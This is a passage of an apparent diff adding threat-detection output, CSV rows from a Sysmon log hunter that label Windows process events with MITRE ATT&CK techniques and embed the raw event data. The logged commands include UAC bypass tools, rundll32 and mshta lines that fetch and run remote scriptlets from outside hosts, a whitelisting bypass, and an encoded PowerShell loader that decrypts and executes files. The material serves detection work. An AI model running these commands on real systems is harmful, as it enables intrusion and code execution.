HIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1086] PowerShell Process found,1611667274.399477,2021-01-26T17:21:14.399477+04:00,,Threat,High,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell.exe start-process notepad.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 2429138
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ LAPTOP-JU4M3I0E
+
+
+
+
+
+ 2021-01-26 13:21:14.021
+ 00247C92-174A-6010-0000-0010C0B2D92E
+ 18548
+ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
+ 10.0.18362.1 (WinBuild.160101.0800)
+ Windows PowerShell
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ PowerShell.EXE
+ powershell.exe start-process notepad.exe
+ C:\Users\bouss\source\repos\blabla\blabla\
+ LAPTOP-JU4M3I0E\bouss
+ 00247C92-5082-600D-0000-0020A246F726
+ 0x26f746a2
+ 5
+ Medium
+ SHA1=2223E8613BB0DD90888B17367007489FE16693E4,MD5=BCC5A6493E0641AA1E60CBF69469E579,SHA256=7762A4766BC394B4CB2D658144B207183FF23B3139181CD74E615DB63E6E57D6,IMPHASH=C6A0924236A2CDF364F3D2FAD87F702A
+ 00247C92-1749-6010-0000-0010EFAAD92E
+ 23168
+ C:\Windows\SysWOW64\cmd.exe
+ "C:\windows\system32\cmd.exe" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd
+
+",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
+[T1053] Scheduled Task - Process,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( "C:\Windows\System32\schtasks.exe" /delete /tn elevator ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16249
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 00:32:40.164
+ 365ABB72-69A8-5CD7-0000-0010C0982200
+ 3792
+ C:\Windows\System32\schtasks.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Manages scheduled tasks
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\schtasks.exe" /delete /tn elevator
+ c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
+ IEWIN7\IEUser
+ 365ABB72-5DEC-5CD7-0000-00204A380100
+ 0x1384a
+ 1
+ High
+ SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9
+ 365ABB72-6998-5CD7-0000-00104E422200
+ 2740
+ C:\Python27\python.exe
+ python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558969965.49171,2019-05-27T19:12:45.491710+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name="swprv") get state ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 6175
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 15:12:45.383
+ 365ABB72-FE6D-5CEB-0000-0010332A0C00
+ 3876
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name="swprv") get state
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 365ABB72-7B40-5CEC-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-FD85-5CEB-0000-00104C0E0B00
+ 1944
+ C:\Windows\System32\notepad.exe
+ "C:\Windows\System32\notepad.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1558969965.49171,2019-05-27T19:12:45.491710+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name="swprv") get state ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 6175
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 15:12:45.383
+ 365ABB72-FE6D-5CEB-0000-0010332A0C00
+ 3876
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name="swprv") get state
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 365ABB72-7B40-5CEC-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-FD85-5CEB-0000-00104C0E0B00
+ 1944
+ C:\Windows\System32\notepad.exe
+ "C:\Windows\System32\notepad.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5410
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-08-03 11:23:17.702
+ 747F3D96-6EA5-5D45-0000-00108FD3E100
+ 7844
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe"
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-D4E9-5D45-0000-0020E7030000
+ 0x3e7
+ 1
+ System
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-6EA5-5D45-0000-0010EED0E100
+ 4768
+ C:\Windows\SysWOW64\WerFault.exe
+ C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4348 -ip 4348
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564829508.675628,2019-08-03T14:51:48.675628+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\windows\system32\cmd.exe "C:\Program Files\Windows Media Player\osk.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5308
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-08-03 10:51:47.872
+ 747F3D96-6743-5D45-0000-001068D7B500
+ 6456
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ C:\windows\system32\cmd.exe "C:\Program Files\Windows Media Player\osk.exe"
+ C:\Users\IEUser\Desktop\
+ MSEDGEWIN10\IEUser
+ 747F3D96-56A3-5D45-0000-0020FBD31800
+ 0x18d3fb
+ 1
+ Medium
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-6742-5D45-0000-00104A66B500
+ 6380
+ C:\Users\IEUser\Desktop\UACME.exe
+ UACME.exe 32
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1602619902.279861,2020-10-14T00:11:42.279861+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\windows\system32\cmd.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 2196442
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ LAPTOP-JU4M3I0E
+
+
+
+
+
+ 2020-10-13 20:11:42.277
+ 00247C92-09FE-5F86-0000-0010AC861401
+ 6372
+ C:\Windows\System32\cmd.exe
+ 10.0.18362.449 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ c:\windows\system32\cmd.exe
+ c:\Windows\System32\
+ LAPTOP-JU4M3I0E\bouss
+ 00247C92-DE70-5F85-0000-002059F80600
+ 0x6f859
+ 1
+ Medium
+ SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 00247C92-09FE-5F86-0000-001051841401
+ 1716
+ C:\Windows\System32\wuauclt.exe
+ wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer
+
+",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558452777.286254,2019-05-21T19:32:57.286254+04:00,,Threat,Low,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /C rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4125
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-21 15:32:57.276
+ 365ABB72-1A29-5CE4-0000-001054E32101
+ 1532
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd.exe /C rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true);
+ C:\Users\IEUser\Desktop\
+ IEWIN7\IEUser
+ 365ABB72-39CC-5CE3-0000-002096C70000
+ 0xc796
+ 1
+ High
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-4F8A-5CE3-0000-0010C5BB4800
+ 3548
+ C:\Windows\System32\cmd.exe
+ "cmd.exe" /s /k pushd "C:\Users\IEUser\Desktop"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1611667274.296774,2021-01-26T17:21:14.296774+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\SysWOW64\cmd.exe ) through command line ( "C:\windows\system32\cmd.exe" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 2429137
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ LAPTOP-JU4M3I0E
+
+
+
+
+
+ 2021-01-26 13:21:13.976
+ 00247C92-1749-6010-0000-0010EFAAD92E
+ 23168
+ C:\Windows\SysWOW64\cmd.exe
+ 10.0.18362.1316 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ "C:\windows\system32\cmd.exe" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd
+ C:\Users\bouss\source\repos\blabla\blabla\
+ LAPTOP-JU4M3I0E\bouss
+ 00247C92-5082-600D-0000-0020A246F726
+ 0x26f746a2
+ 5
+ Medium
+ SHA1=DE550F262D31FF81730867A7E294795D085F503B,MD5=E567B7F80B21CC8905383BE1073F3707,SHA256=E5CC034E9062E1211FDDE5F85EBF2BD4E4EF63272BA23877C185C94FB503891E,IMPHASH=392B4D61B1D1DADC1F06444DF258188A
+ 00247C92-1749-6010-0000-0010348FD92E
+ 2988
+ C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe
+ C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false
+
+",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920560.124804,2019-05-27T05:29:20.124804+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Description: Cannot read configuration file due to insufficient permissions" /text:password ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5979
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 01:29:20.084
+ 365ABB72-3D70-5CEB-0000-0010F2DEFF00
+ 2772
+ C:\Windows\System32\inetsrv\appcmd.exe
+ 7.5.7600.16385 (win7_rtm.090713-1255)
+ Application Server Command Line Admin Tool
+ Internet Information Services
+ Microsoft Corporation
+ "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Description: Cannot read configuration file due to insufficient permissions" /text:password
+ C:\Windows\Temp\
+ IIS APPPOOL\DefaultAppPool
+ 365ABB72-B26B-5CEA-0000-002023240800
+ 0x82423
+ 0
+ High
+ SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
+ 365ABB72-3D4A-5CEB-0000-0010FA93FD00
+ 2584
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1557621160.342246,2019-05-12T04:32:40.342246+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16248
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 00:32:35.289
+ 365ABB72-69A3-5CD7-0000-00109D7F2200
+ 1860
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ c:\Windows\System32\cmd.exe
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 365ABB72-DC77-5CD7-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-69A3-5CD7-0000-001064792200
+ 3432
+ C:\Windows\System32\taskeng.exe
+ taskeng.exe {9C7BC894-6658-423B-9B58-61636DBB1451} S-1-5-18:NT AUTHORITY\System:Service:
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564435998.310206,2019-07-30T01:33:18.310206+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close(); ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4902
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:33:18.241
+ 747F3D96-661E-5D3F-0000-0010A3148700
+ 776
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd /c mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close();
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-6609-5D3F-0000-00109FBF8500
+ 1208
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1558969965.405337,2019-05-27T19:12:45.405337+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name="VSS") get state ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 6173
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 15:12:44.023
+ 365ABB72-FE6C-5CEB-0000-0010050C0C00
+ 3520
+ C:\Windows\System32\wbem\WMIC.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ WMI Commandline Utility
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name="VSS") get state
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 365ABB72-7B40-5CEC-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443
+ 365ABB72-FE6B-5CEB-0000-00102A090C00
+ 1536
+ C:\Windows\System32\cmd.exe
+ cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name="VSS") get state
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16452
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 14:18:09.573
+ 365ABB72-2B21-5CD8-0000-001039DD2500
+ 816
+ C:\Windows\System32\rundll32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\rundll32.exe" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe
+ C:\Users\IEUser\
+ IEWIN7\IEUser
+ 365ABB72-2523-5CD8-0000-00204C360100
+ 0x1364c
+ 1
+ Medium
+ SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
+ 365ABB72-2B1B-5CD8-0000-0010CCC92500
+ 3320
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe )",1,"
+
+
+
+
